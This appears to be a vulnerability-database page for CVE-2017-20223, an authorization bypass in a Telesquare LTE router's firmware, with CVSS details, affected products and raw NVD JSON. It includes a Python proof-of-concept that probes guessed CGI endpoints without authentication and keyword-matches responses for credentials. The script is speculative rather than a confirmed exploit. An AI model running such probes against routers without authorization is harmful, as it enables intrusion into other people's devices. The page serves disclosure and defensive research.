Security Vulnerability Report
CVE-2017-20223 CVSS 9.8 CRITICAL

CVE-2017-20223

Published: 2026-03-16 14:17:52
Last Modified: 2026-04-14 16:57:28

Description

Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization and access resources by manipulating user-supplied input parameters. Attackers can directly reference objects in the system to retrieve sensitive information and access functionalities without proper access controls.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:* - NOT VULNERABLE
Telesquare SKT LTE Router SDT-CS3B1 firmware 1.2.0
Lower firmware versions may also be affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2017-20223 PoC - Telesquare SKT LTE Router SDT-CS3B1 IDOR Vulnerability

This PoC demonstrates the Insecure Direct Object Reference vulnerability
in Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0

Note: This is for educational and authorized testing purposes only.
"""

import requests
import sys

# Target router IP address (replace with actual target)
TARGET_IP = "192.168.1.1"
TARGET_PORT = 80
TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}"


def check_vulnerability():
    """
    Check if the target router is vulnerable to CVE-2017-20223
    """
    print(f"[*] Testing target: {TARGET_URL}")
    print("[*] Checking for IDOR vulnerability (CVE-2017-20223)")

    # Common endpoints that might be vulnerable
    vulnerable_endpoints = [
        "/cgi-bin/admin.cgi",
        "/cgi-bin/system.cgi",
        "/cgi-bin/network.cgi",
        "/cgi-bin/wireless.cgi",
        "/cgi-bin/security.cgi"
    ]

    # Test parameters that might be manipulated
    test_params = [
        {"id": "1"},
        {"config_id": "1"},
        {"page": "admin"},
        {"mode": "read"},
        {"section": "system"}
    ]

    for endpoint in vulnerable_endpoints:
        for params in test_params:
            try:
                url = TARGET_URL + endpoint
                print(f"[*] Testing: {url} with params: {params}")

                # Send request without authentication
                response = requests.get(url, params=params, timeout=5)

                # Check if we got unauthorized access
                if response.status_code == 200:
                    content = response.text.lower()

                    # Check for sensitive information indicators.
                    # This keyword match is a loose heuristic: a login or error
                    # page that mentions any of these words also matches, so a
                    # hit is not proof of unauthorized access.
                    if any(keyword in content for keyword in
                           ['password', 'admin', 'ssid', 'key', 'wpa', 'dns', 'ip']):
                        print(f"[!] Potential vulnerability found at {endpoint}")
                        print("[!] Response contains sensitive data")
                        return True

            except requests.exceptions.RequestException as e:
                print(f"[-] Error accessing {endpoint}: {e}")

    print("[*] No obvious vulnerability detected")
    return False


def exploit_idor(endpoint, param_name, param_value):
    """
    Attempt to exploit the IDOR vulnerability
    """
    print(f"[*] Attempting IDOR exploit on {endpoint}")

    url = TARGET_URL + endpoint
    params = {param_name: param_value}

    try:
        response = requests.get(url, params=params, timeout=5)

        if response.status_code == 200:
            print(f"[!] Successfully accessed resource with {param_name}={param_value}")
            print(f"[*] Response length: {len(response.text)} bytes")

            # Save response for analysis
            with open("idor_response.txt", "w") as f:
                f.write(response.text)
            print("[*] Response saved to idor_response.txt")

            return response.text

    except requests.exceptions.RequestException as e:
        print(f"[-] Exploit failed: {e}")

    # Non-200 response or request error
    return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2017-20223 IDOR Vulnerability PoC")
    print("Target: Telesquare SKT LTE Router SDT-CS3B1")
    print("=" * 60)

    # Optional first argument overrides the default target address
    if len(sys.argv) > 1:
        TARGET_IP = sys.argv[1]
        TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}"

    if check_vulnerability():
        print("\n[!] Target appears to be vulnerable!")
        print("[!] Manual verification recommended")
    else:
        print("\n[*] Target may not be vulnerable or is not reachable")
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20223", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:52.347", "lastModified": "2026-04-14T16:57:27.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization and access resources by manipulating user-supplied input parameters. Attackers can directly reference objects in the system to retrieve sensitive information and access functionalities without proper access controls."}, {"lang": "es", "value": "La versión de firmware 1.2.0 del Telesquare SKT LTE Router SDT-CS3B1 contiene una vulnerabilidad de referencia directa a objeto insegura que permite a los atacantes eludir la autorización y acceder a recursos manipulando parámetros de entrada proporcionados por el usuario. Los atacantes pueden referenciar directamente objetos en el sistema para recuperar información sensible y acceder a funcionalidades sin los controles de acceso adecuados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1CB1EF95-F220-467F-903C-0727F5250CF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "81DED0D5-BDBB-4310-BD2D-0F4ED27B274B"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017120297", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/136993", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": 
"https://packetstormsecurity.com/files/145551", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/43402/", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/telesquare-skt-lte-router-sdt-cs3b1-insecure-direct-object-reference", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5445.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}